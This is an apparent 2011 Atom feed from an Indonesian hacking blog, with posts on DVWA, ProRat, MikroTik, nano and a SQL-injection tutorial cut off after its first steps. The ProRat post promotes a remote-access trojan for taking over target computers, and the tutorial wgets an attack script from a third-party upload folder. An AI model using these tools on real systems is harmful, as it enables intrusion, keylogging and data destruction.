rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/installing-linux-billing.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkMMR3k9eCp7ImA9Wx9WFU0.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-983060464515230158</id><published>2011-01-19T19:25:00.003+07:00</published><updated>2011-01-20T14:28:06.760+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-20T14:28:06.760+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools" /><title>DVWA Web Hacking</title><content type="html">&lt;div class="post-body entry-content"&gt;&lt;div style="text-align: justify;"&gt; &lt;a href="http://3.bp.blogspot.com/_vzHp3fW2PNc/SudpRZd4vqI/AAAAAAAABNQ/VikDLD6D28M/s1600-h/SP32-20091028-044126.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 149px; height: 100px;" src="http://3.bp.blogspot.com/_vzHp3fW2PNc/SudpRZd4vqI/AAAAAAAABNQ/VikDLD6D28M/s200/SP32-20091028-044126.jpg" alt="" id="BLOGGER_PHOTO_ID_5397398426041761442" border="0" /&gt;&lt;/a&gt; &lt;span&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a href="http://sourceforge.net/projects/dvwa/files/dvwa-1.0.6.zip"&gt;&lt;span style="font-weight: bold;"&gt;Damn Vulnerable Web Application (DVWA)&lt;/span&gt;&lt;/a&gt; is a collection of web hacking tool based on PHP / mySQL.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;span&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;DVWA may be an option for beginners to learn web hacking web hacking techniques from scratch.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;span&gt; &lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;Various techniques web hacking attacks can be obtained from this tool.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;span&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;Besides easy to use, lightweight and complete, DVWA run through a local server (localhost) using WAMP / XAMP / LAMP and others.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt; &lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt; &lt;div style="text-align: justify;"&gt; &lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;DVWA include some web hacking tools such as:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;- SQL Injection&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt; &lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;- XSS (Cross Site Scripting)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt; &lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;- LFI (Local File Inclusion)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt; &lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;- RFI (Remote File Inclusion)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt; &lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;- Command Execution&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt; &lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;- Upload Script&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt; &lt;span&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;- Login Brute Force&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a href="http://sourceforge.net/projects/dvwa/files/dvwa-1.0.6.zip"&gt;&lt;span style="font-weight: bold;"&gt;Download DVWA&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-983060464515230158?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/F76AGGgYLSse1kdAUO8FKc-MBns/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/F76AGGgYLSse1kdAUO8FKc-MBns/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/F76AGGgYLSse1kdAUO8FKc-MBns/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/F76AGGgYLSse1kdAUO8FKc-MBns/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/UBYKRBIyVOs" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/983060464515230158?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/983060464515230158?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/UBYKRBIyVOs/dvwa-web-hacking.html" title="DVWA Web Hacking" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_vzHp3fW2PNc/SudpRZd4vqI/AAAAAAAABNQ/VikDLD6D28M/s72-c/SP32-20091028-044126.jpg" height="72" width="72" /><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/dvwa-web-hacking.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkcCQXc6fyp7ImA9Wx9WFUU.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-4114158178791621034</id><published>2011-01-15T09:35:00.002+07:00</published><updated>2011-01-21T10:21:00.917+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-21T10:21:00.917+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools" /><title>Remote Administrator with ProRat</title><content type="html">&lt;div class="post-body entry-content"&gt;&lt;div style="text-align: justify; font-family: arial;"&gt; &lt;a href="http://1.bp.blogspot.com/_vzHp3fW2PNc/S0VFctWfUhI/AAAAAAAABgA/AaOHGs0SNjk/s1600-h/SP32-20100107-092211.jpg"&gt;&lt;span style="font-size:100%;"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 151px; height: 122px;" src="http://1.bp.blogspot.com/_vzHp3fW2PNc/S0VFctWfUhI/AAAAAAAABgA/AaOHGs0SNjk/s200/SP32-20100107-092211.jpg" alt="" id="BLOGGER_PHOTO_ID_5423817685750206994" border="0" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;a href="http://translate.googleusercontent.com/translate_c?hl=id&amp;amp;sl=id&amp;amp;tl=en&amp;amp;u=http://www.prorat.net/&amp;amp;rurl=translate.google.co.id&amp;amp;usg=ALkJrhhf0K592kRTwmeaUIBLfAcidNk4Zw"&gt;&lt;/a&gt;&lt;/span&gt;&lt;a style="font-weight: bold;" href="http://www.prorat.net"&gt;Prorat&lt;/a&gt; is one of RAT (Remote Administration Tools) are widely used to take over the computer system.&lt;/span&gt;&lt;/span&gt; &lt;span&gt;&lt;span style="font-size:100%;"&gt;Tool made by PRO Group, a group of Turkish hackers community, can be used as a tool Hacking computers in a network.&lt;/span&gt;&lt;/span&gt; &lt;span&gt;&lt;span style="font-size:100%;"&gt;Use of  &lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="font-size:100%;"&gt;&lt;a style="font-weight: bold;" href="http://www.prorat.net/"&gt;Prorat&lt;/a&gt; &lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="font-size:100%;"&gt;quite simple, you simply enter the IP (Internet Protocol) is the target computer and then go through one open port.&lt;/span&gt;&lt;/span&gt; &lt;span&gt;&lt;span style="font-size:100%;"&gt;The hardest part is finding where an open port.&lt;/span&gt;&lt;/span&gt; &lt;span&gt;&lt;span style="font-size:100%;"&gt;But you can use a variety of network analysis tools such as nmap, Ethercap, LookHost, etc..&lt;/span&gt;&lt;/span&gt; &lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/div&gt; &lt;span class="fullpost"&gt;&lt;span style=";font-family:arial;font-size:100%;"  &gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_vzHp3fW2PNc/S0VFl7cOGeI/AAAAAAAABgI/rMp8Fos_0tw/s1600-h/SP32-20100107-092257.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 238px;" src="http://1.bp.blogspot.com/_vzHp3fW2PNc/S0VFl7cOGeI/AAAAAAAABgI/rMp8Fos_0tw/s320/SP32-20100107-092257.jpg" alt="" id="BLOGGER_PHOTO_ID_5423817844151163362" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;Here are the features provided by PRORAT:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; - Remote Control&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;- Viewing System Info, application running and the Task Manager&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;- Add process, file, or download files&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt; - Admin FTP&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;- Format the HDD (hard disk damage)&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;- Remotely download&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;- Running MS-DOS, Batch Script, VBScript&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;- Adding a Registry Entry&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;- Keylogger: Password Recording&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;- Make Screnshoot, see your Windows desktop instantly&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;- Send messages and chat&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;span class="google-src-text" style="direction: ltr; text-align: left;"&gt;&lt;/span&gt;- Shutdown, Restart, Control Panel, IExplorer, Registry, Printer and Online Controls&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://translate.googleusercontent.com/translate_c?hl=id&amp;amp;sl=id&amp;amp;tl=en&amp;amp;u=http://www.prorat.net/&amp;amp;rurl=translate.google.co.id&amp;amp;usg=ALkJrhhf0K592kRTwmeaUIBLfAcidNk4Zw"&gt;&lt;span&gt;&lt;span style="font-size:100%;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span&gt;&lt;span style="font-size:100%;"&gt;&lt;a style="font-weight: bold;" href="http://www.prorat.net/"&gt;Download Prorat&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a style="font-weight: bold;" href="http://www.ziddu.com/download/8058693/ProRat_v1.9.zip"&gt;or Download Prorat at here&lt;/a&gt;&lt;br /&gt;&lt;span&gt;&lt;a href="http://www.ziddu.com/download/8058693/ProRat_v1.9.zip"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-4114158178791621034?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/xcJBZC8VemY7dgY_8BGtkmkr_d8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xcJBZC8VemY7dgY_8BGtkmkr_d8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/xcJBZC8VemY7dgY_8BGtkmkr_d8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/xcJBZC8VemY7dgY_8BGtkmkr_d8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/rrrlUcvC85M" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/4114158178791621034?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/4114158178791621034?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/rrrlUcvC85M/remote-administrator-with-prohat.html" title="Remote Administrator with ProRat" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_vzHp3fW2PNc/S0VFctWfUhI/AAAAAAAABgA/AaOHGs0SNjk/s72-c/SP32-20100107-092211.jpg" height="72" width="72" /><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/remote-administrator-with-prohat.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0UGRHs7fyp7ImA9Wx9VEks.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-4663185333127964776</id><published>2011-01-12T09:44:00.001+07:00</published><updated>2011-01-29T09:47:05.507+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-29T09:47:05.507+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Article" /><category scheme="http://www.blogger.com/atom/ns#" term="tutorial" /><title>Membangun Hotspot dengan MikroTik RouterOS</title><content type="html">&lt;div style="text-align: center;"&gt;&lt;img style="width: 266px; height: 166px;" alt="http://www.invasaohacking.com/wp-content/uploads/2010/04/Mikrotik-Hotspot.jpeg" src="http://www.invasaohacking.com/wp-content/uploads/2010/04/Mikrotik-Hotspot.jpeg" /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;div style="text-align: left;"&gt;&lt;b&gt;MikroTikRouterOS™&lt;/b&gt;  merupakansistemoperasiLinuxbase yang diperuntukkan sebagai network  router.Didesain untuk memberikan kemudahan bagi penggunanya.  Administrasinyabisa dilakukan melalui Windowsapplication (WinBox).  Selain itu instalasi dapat dilakukan padastandard computer PC. PC yang  akan dijadikan router mikrotikpun tidakmemerlukan resource yang cukup  besar untuk penggunaan standard,misalnya hanya sebagai gateway.Untuk  keperluan beban yang besar ( network yang kompleks, routingyang rumit  dll) disarankan untuk mempertimbangkan pemilihan resourcePC yang  memadai.&lt;a name="more"&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt; &lt;div&gt;&lt;a href="http://www.blogger.com/post-edit.g?blogID=5776147656938756547&amp;amp;postID=7763048794989162765" name="more"&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;Fasilitaspada mikrotik antara lain sebagai berikut : &lt;/p&gt;&lt;ul&gt;&lt;li&gt; &lt;div align="JUSTIFY" lang="id-ID"&gt;Protokoll routing RIP, OSPF, BGP.&lt;/div&gt; &lt;/li&gt;&lt;li&gt; &lt;div align="JUSTIFY" lang="id-ID"&gt;Statefull firewall&lt;/div&gt; &lt;/li&gt;&lt;li&gt; &lt;div align="JUSTIFY"&gt;Hotspot for Plug-and-Play access&lt;/div&gt; &lt;/li&gt;&lt;li&gt;remote winbox GUI admin&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt; &lt;div align="JUSTIFY" lang="id-ID"&gt;Tutorial lengkap hotspot MikroTik bisa di download &lt;b&gt;&lt;a href="http://www.ziddu.com/download/12195585/hotspot_mikrotik.pdf.html"&gt;disini&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-4663185333127964776?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/S2hOfWpUnfPIAeklPtyLYwpFQrw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/S2hOfWpUnfPIAeklPtyLYwpFQrw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/S2hOfWpUnfPIAeklPtyLYwpFQrw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/S2hOfWpUnfPIAeklPtyLYwpFQrw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/rBeWYYRD7Uk" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/4663185333127964776?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/4663185333127964776?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/rBeWYYRD7Uk/membangun-hotspot-dengan-mikrotik.html" title="Membangun Hotspot dengan MikroTik RouterOS" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/membangun-hotspot-dengan-mikrotik.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0ANSHwyfyp7ImA9Wx9VEks.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-1414553783179251788</id><published>2011-01-11T09:55:00.000+07:00</published><updated>2011-01-29T09:56:39.297+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-29T09:56:39.297+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Article" /><category scheme="http://www.blogger.com/atom/ns#" term="tutorial" /><title>Perintah Dasar Teks Editor Nano</title><content type="html">&lt;p&gt;Panduan ini dibuat untuk memberikan pemahaman menggunakan nano dalam membuat atau mengedit sebuah file dalam sistem &lt;a href="http://en.wikipedia.org/wiki/Unix-like"&gt;Unix-like&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;1. Tentang Nano&lt;/p&gt; &lt;p&gt;&lt;a href="http://en.wikipedia.org/wiki/Nano_%28text_editor%29"&gt;Nano&lt;/a&gt; merupakan sebuah aplikasi editor berbasis teks untuk &lt;a href="http://en.wikipedia.org/wiki/Unix"&gt;Unix&lt;/a&gt; dan sistem Unix-like. Ini adalah tiruan dari &lt;a href="http://en.wikipedia.org/wiki/Pico_%28text_editor%29"&gt;Pico&lt;/a&gt;, editor dari klien email &lt;a href="http://en.wikipedia.org/wiki/Pine_%28e-mail_client%29"&gt;Pine&lt;/a&gt;. Tujuan nano dikembangkan adalah untuk meniru Pico sebaik mungkin dan mungkin mencakup fungsionalitas tambahan.&lt;/p&gt; &lt;p&gt;Nano merupakan perangkat lunak bebas yang dirilis di bawah bendera &lt;a href="http://en.wikipedia.org/wiki/GNU_General_Public_License"&gt;GNU General Public License&lt;/a&gt; (lisensi GPLv3).&lt;/p&gt; 2. Perintah Dasar Nano &lt;ul&gt;&lt;li&gt;-Membuka dan menciptakan sebuah file di nano &lt;p&gt;# nano namafile&lt;/p&gt; &lt;p&gt;contoh:&lt;/p&gt; &lt;p&gt;# nano latihan&lt;/p&gt; &lt;p&gt;Catatan:&lt;br /&gt;Anda juga dapat lansung memberikan format ekstensi pada file teks yang dibuat tersebut, seperti latihan.txt atau latihan.odt&lt;/p&gt;&lt;/li&gt;&lt;p&gt; &lt;/p&gt;&lt;li&gt;-Mengedit file di nano&lt;/li&gt;&lt;p&gt;# nano /etc/issue &lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;li&gt;-Simpan dan Keluar&lt;/li&gt;&lt;p&gt;Menyimpan file, tekan Ctrl+O  (tahan tombol Ctrl lalu tekan O).&lt;br /&gt;Keluar dari nano, tekan Ctrl+X. &lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;li&gt;-Cut dan Paste&lt;/li&gt;&lt;p&gt;cut sebuah baris, tekan Ctrl+K.&lt;br /&gt;paste, tekan Ctrl+U. &lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;li&gt;-Mencari Teks&lt;/li&gt;&lt;p&gt;Tekan Ctrl+W, ketikkan string yang ingin Anda cari, kemudian tekan Enter.&lt;br /&gt;Tekan Alt+W, untuk mencari kembali string yang sama. &lt;/p&gt;&lt;/ul&gt; &lt;p&gt;3. Penutup&lt;/p&gt; &lt;p&gt;Dengan memahami operasi-operasi dasar pada nano tersebut, nantinya  rekan-rekan tidak akan bingung lagi jika mengedit atau membuat sebuah  file teks di dalam sebuah Command Line Interface.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1414553783179251788?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/nIsHtRP7uN4qJkhbevAjrhyTYik/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nIsHtRP7uN4qJkhbevAjrhyTYik/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/nIsHtRP7uN4qJkhbevAjrhyTYik/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nIsHtRP7uN4qJkhbevAjrhyTYik/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/hvbwWBJVUhs" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1414553783179251788?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1414553783179251788?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/hvbwWBJVUhs/perintah-dasar-teks-editor-nano.html" title="Perintah Dasar Teks Editor Nano" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/perintah-dasar-teks-editor-nano.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0UHR3c8eCp7ImA9Wx9XFks.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-3898692497805289442</id><published>2011-01-10T19:57:00.005+07:00</published><updated>2011-01-10T20:13:56.970+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-10T20:13:56.970+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools" /><category scheme="http://www.blogger.com/atom/ns#" term="SQLi" /><title>SQL Injection With Schemafuzz</title><content type="html">&lt;div style="text-align: center;"&gt;                                         &lt;span style="color: rgb(255, 0, 0); font-weight: bold;"&gt;S&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;Q&lt;/span&gt;&lt;span style="color: rgb(255, 0, 0); font-weight: bold;"&gt;L&lt;/span&gt;&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;&lt;span style="color: rgb(255, 0, 0); font-weight: bold;"&gt;I&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;njection &lt;/span&gt;&lt;span style="color: rgb(255, 0, 0); font-weight: bold;"&gt;W&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;ith &lt;/span&gt;&lt;span style="color: rgb(255, 0, 0); font-weight: bold;"&gt;S&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;chemafuzz&lt;/span&gt;&lt;br /&gt;=========================================================&lt;br /&gt;                           Welcome to my tutorial by arianom KiLL-9 CrEw&lt;br /&gt;                                           Powered by kill-9.tk&lt;br /&gt;==================================================================&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;[+] Pertama Kali yang anda butuhkan untuk hacking dengan schemafuzz adalah sebuah sistem operasi Linux, atau account ssh.&lt;br /&gt;Schemafuzz ini dijalankan menggunakan python.&lt;br /&gt;1. login ke account ssh kmu atau masuk ke terminal jika menggunakan linux&lt;br /&gt;2. wget schemafuzz.py : wget &lt;a href="http://undana.ac.id/images/upload/schemafuzz.py"&gt;http://undana.ac.id/images/upload/schemafuzz.py&lt;/a&gt;&lt;br /&gt;3. mv schemafuzz.py f &gt;&gt; untuk memperpendek cmd&lt;br /&gt;4. python f -h  &gt;&gt; mengetahui option cmd&lt;br /&gt;&lt;br /&gt;&gt; ketik python f -h&lt;br /&gt;Usage: python f [options]                            arianom[@]gmail[dot]com kill-9.tk&lt;br /&gt;    Modes:&lt;br /&gt;    Define: --findcol Finds Columns length of a SQLi                    